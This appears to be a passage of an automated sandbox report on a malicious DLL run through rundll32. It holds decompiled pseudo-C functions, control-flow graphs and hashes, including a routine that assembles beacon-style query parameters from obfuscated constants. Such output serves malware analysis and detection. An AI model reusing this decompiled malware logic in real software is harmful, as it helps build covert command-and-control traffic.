                                                                                                                                                                                                                                    0x050aa74f
                                                                                                                                                                                                                                    0x050aa754
                                                                                                                                                                                                                                    0x050aa758
                                                                                                                                                                                                                                    0x050aa797
                                                                                                                                                                                                                                    0x050aa798
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050aa79d
                                                                                                                                                                                                                                    0x050aa75a
                                                                                                                                                                                                                                    0x050aa760
                                                                                                                                                                                                                                    0x050aa764
                                                                                                                                                                                                                                    0x050aa76e
                                                                                                                                                                                                                                    0x050aa779
                                                                                                                                                                                                                                    0x050aa77d
                                                                                                                                                                                                                                    0x050aa788
                                                                                                                                                                                                                                    0x050aa78d
                                                                                                                                                                                                                                    0x050aa790
                                                                                                                                                                                                                                    0x050aa77f
                                                                                                                                                                                                                                    0x050aa782
                                                                                                                                                                                                                                    0x050aa784
                                                                                                                                                                                                                                    0x050aa784
                                                                                                                                                                                                                                    0x050aa795
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050aa7a7

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a4ecc31a437ab2ec29ad68183175022c8187051f2e5b4321f495193e7db50e4
                                                                                                                                                                                                                                    • Instruction ID: 9472aef9f6ddb580f7c41c4d8a3e06c4672275c74e96d54b753a45027dee950b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a4ecc31a437ab2ec29ad68183175022c8187051f2e5b4321f495193e7db50e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC018037300A15ABC712DAE8EC44F9F77BAAFD9750F148429B549CF280DA72D802C7A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A96A4, Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E050A96A4(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;

				_t10 =  *0x50ad270; // 0xd448b889
				_v8 = _t10;
				_v12 = _t10;
				_t23 = 0; // executed
				_t12 = E050A21CD(__ecx,  &_v12); // executed
				if(_t12 != 0) {
					_t14 =  *0x50ad27c; // 0x214a5a8
					_t4 = _t14 + 0x50ae796; // 0x74666f53
					_t17 = E050A7A9A(_t4, 0);
					 *0x50ad33c = _t17;
					if(_t17 != 0) {
						_t18 =  *0x50ad27c; // 0x214a5a8
						_v8 = _v8 ^ 0x738bb12a;
						_t8 = _t18 + 0x50ae862; // 0x61636f4c
						_t21 = E050A7A9A(_t8, 1);
						 *0x50ad344 = _t21;
						if(_t21 != 0) {
							_t23 = 1;
						}
					}
				}
				return _t23;
			}












                                                                                                                                                                                                                                    0x050a96aa
                                                                                                                                                                                                                                    0x050a96b0
                                                                                                                                                                                                                                    0x050a96b3
                                                                                                                                                                                                                                    0x050a96ba
                                                                                                                                                                                                                                    0x050a96bc
                                                                                                                                                                                                                                    0x050a96c3
                                                                                                                                                                                                                                    0x050a96c5
                                                                                                                                                                                                                                    0x050a96ca
                                                                                                                                                                                                                                    0x050a96d5
                                                                                                                                                                                                                                    0x050a96dc
                                                                                                                                                                                                                                    0x050a96e1
                                                                                                                                                                                                                                    0x050a96e3
                                                                                                                                                                                                                                    0x050a96e8
                                                                                                                                                                                                                                    0x050a96ef
                                                                                                                                                                                                                                    0x050a96fb
                                                                                                                                                                                                                                    0x050a9702
                                                                                                                                                                                                                                    0x050a9707
                                                                                                                                                                                                                                    0x050a9709
                                                                                                                                                                                                                                    0x050a9709
                                                                                                                                                                                                                                    0x050a9707
                                                                                                                                                                                                                                    0x050a96e1
                                                                                                                                                                                                                                    0x050a970e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 509aecf1c94f217e00ce2dbf6743c007f9b99d49381e5b1e243c689462499a0b
                                                                                                                                                                                                                                    • Instruction ID: eab8fe06f9e03ab97a20de08eeea485fe61261c9c7f943f4abf1df9614bea527
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 509aecf1c94f217e00ce2dbf6743c007f9b99d49381e5b1e243c689462499a0b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F03C73621119ABCB21DFF8EA858CE7BFCEB58200F104063E502D7200EA74D605CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A8055, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					__imp__(0x50ad23c);
					if(_t4 == 0) {
						E050A970F();
					}
				} else {
					_t7 = _t4 - 1;
					if(_t7 == 0) {
						__imp__(0x50ad23c);
						if(_t7 == 1) {
							_t8 = E050A6A56(_t7, _t9, _t10, _v0); // executed
							if(_t8 != 0) {
								_t12 = 0;
							}
						}
					}
				}
				return _t12;
			}










                                                                                                                                                                                                                                    0x050a805c
                                                                                                                                                                                                                                    0x050a805d
                                                                                                                                                                                                                                    0x050a8060
                                                                                                                                                                                                                                    0x050a808a
                                                                                                                                                                                                                                    0x050a8092
                                                                                                                                                                                                                                    0x050a8094
                                                                                                                                                                                                                                    0x050a8094
                                                                                                                                                                                                                                    0x050a8062
                                                                                                                                                                                                                                    0x050a8062
                                                                                                                                                                                                                                    0x050a8063
                                                                                                                                                                                                                                    0x050a806a
                                                                                                                                                                                                                                    0x050a8072
                                                                                                                                                                                                                                    0x050a8078
                                                                                                                                                                                                                                    0x050a807f
                                                                                                                                                                                                                                    0x050a8081
                                                                                                                                                                                                                                    0x050a8081
                                                                                                                                                                                                                                    0x050a807f
                                                                                                                                                                                                                                    0x050a8072
                                                                                                                                                                                                                                    0x050a8063
                                                                                                                                                                                                                                    0x050a809c

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a0cc20060573337b2ec684ef620cdf85caac366d9b751a14083cac8b7cb1c49a
                                                                                                                                                                                                                                    • Instruction ID: b07fa011b10f177b014ffbc941b839f018548e25ab2ef28487e53a03485face0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0cc20060573337b2ec684ef620cdf85caac366d9b751a14083cac8b7cb1c49a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BE086773542215796F16BF4B808F6EBAD2BF60A80F05C414F68AD8055DA24C841EBD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Analysis Process: rundll32.exe PID: 7100 Parent PID: 5004 rundll32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 04C3ADE5, Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 4c3ade5-4c3ae4a 1 4c3ae6b-4c3ae95 0->1 2 4c3ae4c-4c3ae66 0->2 3 4c3ae97 1->3 4 4c3ae9a-4c3aea6 1->4 10 4c3b01b-4c3b01f 2->10 3->4 6 4c3aeb9-4c3aebb 4->6 7 4c3aea8-4c3aeb3 4->7 8 4c3af63-4c3af6d 6->8 9 4c3aec1-4c3aec8 6->9 7->6 18 4c3affe-4c3b005 7->18 13 4c3af79-4c3af7b 8->13 14 4c3af6f-4c3af77 8->14 11 4c3aeca-4c3aed6 9->11 12 4c3aed8 9->12 11->12 27 4c3af28-4c3af34 11->27 24 4c3aee1-4c3aee5 12->24 16 4c3aff9-4c3affc 13->16 17 4c3af7d-4c3af80 13->17 14->13 16->18 19 4c3af82-4c3af85 17->19 20 4c3afae-4c3afbc 17->20 22 4c3b007-4c3b014 18->22 23 4c3b019 18->23 19->20 26 4c3af87-4c3af92 19->26 20->16 33 4c3afbe-4c3afce 20->33 22->23 23->10 24->27 28 4c3aee7-4c3aef7 24->28 26->20 29 4c3af94-4c3af9a 26->29 35 4c3af36-4c3af3a 27->35 36 4c3af5c 27->36 38 4c3af07-4c3af23 28->38 39 4c3aef9-4c3af05 28->39 29->20 32 4c3af9c-4c3af9f 29->32 32->20 37 4c3afa1-4c3afac 32->37 43 4c3afd0-4c3afd8 33->43 44 4c3afda-4c3afdc 33->44 35->8 40 4c3af3c-4c3af48 35->40 36->8 37->16 37->20 38->10 39->27 39->38 40->8 48 4c3af4a-4c3af5a 40->48 43->44 44->16 46 4c3afde-4c3aff6 44->46 46->16 48->8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction ID: 105154be72ae107b8419f3536e73fca489a614f435dfab61f5e2477ae742e18b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF8129B9A00205AFDB10CF99D884BAEB7F6EB4C312F148129F945E7240EB75EA55CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38B94, Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 51 4c38b94-4c38ba6 52 4c38ba8 51->52 53 4c38bae-4c38c2c call 4c31c1a call 4c354bc 51->53 52->53 60 4c38c55-4c38c5f call 4c37649 53->60 61 4c38c2e-4c38c4d 53->61 65 4c38c61-4c38c7e 60->65 66 4c38c86-4c38ca0 call 4c39395 60->66 61->60 65->66 70 4c38e63-4c38e67 66->70 71 4c38ca6-4c38cbd 66->71 73 4c38e6f-4c38e76 70->73 74 4c38cc3-4c38d20 call 4c37a80 call 4c38307 71->74 75 4c38e57-4c38e5b 71->75 83 4c38d26-4c38d3d call 4c33cc8 74->83 84 4c38e4b-4c38e4f 74->84 75->70 88 4c38d43-4c38d7a call 4c3809f 83->88 89 4c38e41-4c38e43 83->89 84->75 96 4c38d80-4c38d8e call 4c343df 88->96 97 4c38e79-4c38e80 88->97 89->84 103 4c38dd2-4c38dd9 96->103 104 4c38d90-4c38d9e call 4c3163f 96->104 98 4c38e2d call 4c3a1b0 97->98 102 4c38e32-4c38e3f 98->102 102->89 105 4c38de5-4c38de9 103->105 106 4c38ddb-4c38ddf 103->106 112 4c38da3-4c38dcd call 4c39039 104->112 110 4c38e16-4c38e22 call 4c39039 105->110 111 4c38deb-4c38df0 105->111 109 4c38de1 106->109 106->110 109->105 110->102 118 4c38e24-4c38e2b 110->118 111->110 113 4c38df2-4c38e14 call 4c38f0a call 4c385db 111->113 112->103 113->110 118->98 118->102
                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E04C38B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t99;
				unsigned int _t103;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t121;
				void* _t125;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				void* _t153;
				void* _t155;

				_t138 = __edx;
				_t129 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					__imp__();
				}
				_t60 =  *0x4c3d018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x4c3d014; // 0x3a87c8cd
				_t127 = _a16;
				_t146 =  *0x4c3d120; // 0x73fcc740
				asm("bswap eax");
				_t62 =  *0x4c3d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4c3d00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x4c3d27c; // 0x202a5a8
				_t3 = _t64 + 0x4c3e633; // 0x74666f73
				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4c3d02c,  *0x4c3d004, _t59);
				_t68 =  *0x4c3d27c; // 0x202a5a8
				_t4 = _t68 + 0x4c3e673; // 0x74707526
				_t71 =  *_t146(_t139 + _t127, _t4, E04C31C1A());
				_t155 = _t153 + 0x38;
				_t140 = _t139 + _t71; // executed
				_t72 = E04C354BC(_t129); // executed
				_t128 = __imp__; // 0x76d25520
				_v8 = _t72;
				if(_t72 != 0) {
					_t121 =  *0x4c3d27c; // 0x202a5a8
					_t7 = _t121 + 0x4c3e8eb; // 0x736e6426
					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
					_t155 = _t155 + 0xc;
					_t140 = _t140 + _t125;
					 *_t128( *0x4c3d238, 0, _v8);
				}
				_t73 = E04C37649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t116 =  *0x4c3d27c; // 0x202a5a8
					_t11 = _t116 + 0x4c3e8f3; // 0x6f687726
					 *_t146(_t140 + _a16, _t11, _t73);
					_t155 = _t155 + 0xc;
					 *_t128( *0x4c3d238, 0, _v8);
				}
				_t141 =  *0x4c3d32c; // 0x6c695b0
				_t75 = E04C39395(0x4c3d00a, _t141 + 4);
				_t147 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					 *_t128( *0x4c3d238, _t147, _a16); // executed
					return _v12;
				} else {
					__imp__( *0x4c3d238, 0, 0x800);
					_v8 = _t75;
					if(_t75 == 0) {
						L25:
						 *_t128( *0x4c3d238, _t147, _v20);
						goto L26;
					}
					__imp__();
					E04C37A80(_t75);
					_t80 =  *0x4c3d32c; // 0x6c695b0
					__imp__(_t80 + 0x40);
					asm("lock xadd [eax], ecx");
					_t84 =  *0x4c3d32c; // 0x6c695b0
					__imp__(_t84 + 0x40);
					_t86 =  *0x4c3d32c; // 0x6c695b0
					_t143 = E04C38307(1, _t138, _a16,  *_t86);
					_v28 = _t143;
					asm("lock xadd [eax], ecx");
					if(_t143 == 0) {
						L24:
						 *_t128( *0x4c3d238, _t147, _v8);
						goto L25;
					}
					 *0x4c3d104(_t143, 0x4c3c2ac);
					_push(_t143);
					_t92 = E04C33CC8();
					_v16 = _t92;
					if(_t92 == 0) {
						L23:
						 *_t128( *0x4c3d238, _t147, _t143);
						goto L24;
					}
					_t148 = __imp__; // 0x76d68170
					 *_t148(_t143, _a4);
					 *_t148(_v8, _v20);
					_t149 = __imp__; // 0x76d681d0
					 *_t149(_v8, _v16);
					 *_t149(_v8, _t143);
					_t99 = E04C3809F(0, _v8);
					_a4 = _t99;
					if(_t99 == 0) {
						_v12 = 8;
						L21:
						E04C3A1B0();
						L22:
						 *_t128( *0x4c3d238, 0, _v16);
						_t147 = 0;
						goto L23;
					}
					_t103 = E04C343DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
					_v12 = _t103;
					if(_t103 == 0) {
						_t152 = _v24;
						_t107 = E04C3163F(_t152, _a4, _a8, _a12); // executed
						_v12 = _t107;
						_t108 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
						_t110 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						_t112 =  *((intOrPtr*)(_t152 + 4));
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_t114 =  *_t152;
						_t103 = E04C39039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t103 = _a8;
							if(_t103 != 0) {
								_t144 =  *_t103;
								_t150 =  *_a12;
								_push( *_a12);
								_push(_t144);
								_push(_t144);
								L04C38F0A();
								_t103 = E04C385DB(_t144, _t144, _t150 >> 1);
								_t143 = _v28;
								 *_a12 = _t103;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04C39039(_t103, _a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}




















































                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b9f
                                                                                                                                                                                                                                    0x04c38ba6
                                                                                                                                                                                                                                    0x04c38ba8
                                                                                                                                                                                                                                    0x04c38ba8
                                                                                                                                                                                                                                    0x04c38bb5
                                                                                                                                                                                                                                    0x04c38bc0
                                                                                                                                                                                                                                    0x04c38bc3
                                                                                                                                                                                                                                    0x04c38bc8
                                                                                                                                                                                                                                    0x04c38bcb
                                                                                                                                                                                                                                    0x04c38bd1
                                                                                                                                                                                                                                    0x04c38bd4
                                                                                                                                                                                                                                    0x04c38bd9
                                                                                                                                                                                                                                    0x04c38bdc
                                                                                                                                                                                                                                    0x04c38be1
                                                                                                                                                                                                                                    0x04c38be4
                                                                                                                                                                                                                                    0x04c38bf0
                                                                                                                                                                                                                                    0x04c38bfd
                                                                                                                                                                                                                                    0x04c38c05
                                                                                                                                                                                                                                    0x04c38c0a
                                                                                                                                                                                                                                    0x04c38c15
                                                                                                                                                                                                                                    0x04c38c17
                                                                                                                                                                                                                                    0x04c38c1a
                                                                                                                                                                                                                                    0x04c38c1c
                                                                                                                                                                                                                                    0x04c38c23
                                                                                                                                                                                                                                    0x04c38c29
                                                                                                                                                                                                                                    0x04c38c2c
                                                                                                                                                                                                                                    0x04c38c2f
                                                                                                                                                                                                                                    0x04c38c34
                                                                                                                                                                                                                                    0x04c38c41
                                                                                                                                                                                                                                    0x04c38c43
                                                                                                                                                                                                                                    0x04c38c49
                                                                                                                                                                                                                                    0x04c38c53
                                                                                                                                                                                                                                    0x04c38c53
                                                                                                                                                                                                                                    0x04c38c55
                                                                                                                                                                                                                                    0x04c38c5c
                                                                                                                                                                                                                                    0x04c38c5f
                                                                                                                                                                                                                                    0x04c38c62
                                                                                                                                                                                                                                    0x04c38c67
                                                                                                                                                                                                                                    0x04c38c74
                                                                                                                                                                                                                                    0x04c38c76
                                                                                                                                                                                                                                    0x04c38c84
                                                                                                                                                                                                                                    0x04c38c84
                                                                                                                                                                                                                                    0x04c38c86
                                                                                                                                                                                                                                    0x04c38c94
                                                                                                                                                                                                                                    0x04c38c99
                                                                                                                                                                                                                                    0x04c38c9d
                                                                                                                                                                                                                                    0x04c38ca0
                                                                                                                                                                                                                                    0x04c38e63
                                                                                                                                                                                                                                    0x04c38e6d
                                                                                                                                                                                                                                    0x04c38e76
                                                                                                                                                                                                                                    0x04c38ca6
                                                                                                                                                                                                                                    0x04c38cb2
                                                                                                                                                                                                                                    0x04c38cba
                                                                                                                                                                                                                                    0x04c38cbd
                                                                                                                                                                                                                                    0x04c38e57
                                                                                                                                                                                                                                    0x04c38e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e61
                                                                                                                                                                                                                                    0x04c38cc3
                                                                                                                                                                                                                                    0x04c38cc9
                                                                                                                                                                                                                                    0x04c38cce
                                                                                                                                                                                                                                    0x04c38cd7
                                                                                                                                                                                                                                    0x04c38ce8
                                                                                                                                                                                                                                    0x04c38cec
                                                                                                                                                                                                                                    0x04c38cf5
                                                                                                                                                                                                                                    0x04c38cfb
                                                                                                                                                                                                                                    0x04c38d0a
                                                                                                                                                                                                                                    0x04c38d11
                                                                                                                                                                                                                                    0x04c38d1a
                                                                                                                                                                                                                                    0x04c38d20
                                                                                                                                                                                                                                    0x04c38e4b
                                                                                                                                                                                                                                    0x04c38e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e55
                                                                                                                                                                                                                                    0x04c38d2c
                                                                                                                                                                                                                                    0x04c38d32
                                                                                                                                                                                                                                    0x04c38d33
                                                                                                                                                                                                                                    0x04c38d3a
                                                                                                                                                                                                                                    0x04c38d3d
                                                                                                                                                                                                                                    0x04c38e41
                                                                                                                                                                                                                                    0x04c38e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e49
                                                                                                                                                                                                                                    0x04c38d46
                                                                                                                                                                                                                                    0x04c38d4d
                                                                                                                                                                                                                                    0x04c38d55
                                                                                                                                                                                                                                    0x04c38d5a
                                                                                                                                                                                                                                    0x04c38d63
                                                                                                                                                                                                                                    0x04c38d69
                                                                                                                                                                                                                                    0x04c38d70
                                                                                                                                                                                                                                    0x04c38d77
                                                                                                                                                                                                                                    0x04c38d7a
                                                                                                                                                                                                                                    0x04c38e79
                                                                                                                                                                                                                                    0x04c38e2d
                                                                                                                                                                                                                                    0x04c38e2d
                                                                                                                                                                                                                                    0x04c38e32
                                                                                                                                                                                                                                    0x04c38e3d
                                                                                                                                                                                                                                    0x04c38e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e3f
                                                                                                                                                                                                                                    0x04c38d84
                                                                                                                                                                                                                                    0x04c38d8b
                                                                                                                                                                                                                                    0x04c38d8e
                                                                                                                                                                                                                                    0x04c38d93
                                                                                                                                                                                                                                    0x04c38d9e
                                                                                                                                                                                                                                    0x04c38da3
                                                                                                                                                                                                                                    0x04c38da6
                                                                                                                                                                                                                                    0x04c38dac
                                                                                                                                                                                                                                    0x04c38db2
                                                                                                                                                                                                                                    0x04c38db8
                                                                                                                                                                                                                                    0x04c38dbb
                                                                                                                                                                                                                                    0x04c38dc1
                                                                                                                                                                                                                                    0x04c38dc4
                                                                                                                                                                                                                                    0x04c38dcd
                                                                                                                                                                                                                                    0x04c38dcd
                                                                                                                                                                                                                                    0x04c38dd9
                                                                                                                                                                                                                                    0x04c38de5
                                                                                                                                                                                                                                    0x04c38de9
                                                                                                                                                                                                                                    0x04c38deb
                                                                                                                                                                                                                                    0x04c38df0
                                                                                                                                                                                                                                    0x04c38df2
                                                                                                                                                                                                                                    0x04c38df7
                                                                                                                                                                                                                                    0x04c38df9
                                                                                                                                                                                                                                    0x04c38dfa
                                                                                                                                                                                                                                    0x04c38dfb
                                                                                                                                                                                                                                    0x04c38dfc
                                                                                                                                                                                                                                    0x04c38e09
                                                                                                                                                                                                                                    0x04c38e11
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38ddb
                                                                                                                                                                                                                                    0x04c38ddf
                                                                                                                                                                                                                                    0x04c38e16
                                                                                                                                                                                                                                    0x04c38e19
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x04c38dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction ID: ba185fc3ce7b046f8885aab4a7c747515c20991a6456bb4a3e0796eab837ba10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B913979900208AFDB11EFA8DC84BAE7BBAEF48356F144054F806E7260D739ED51DB60
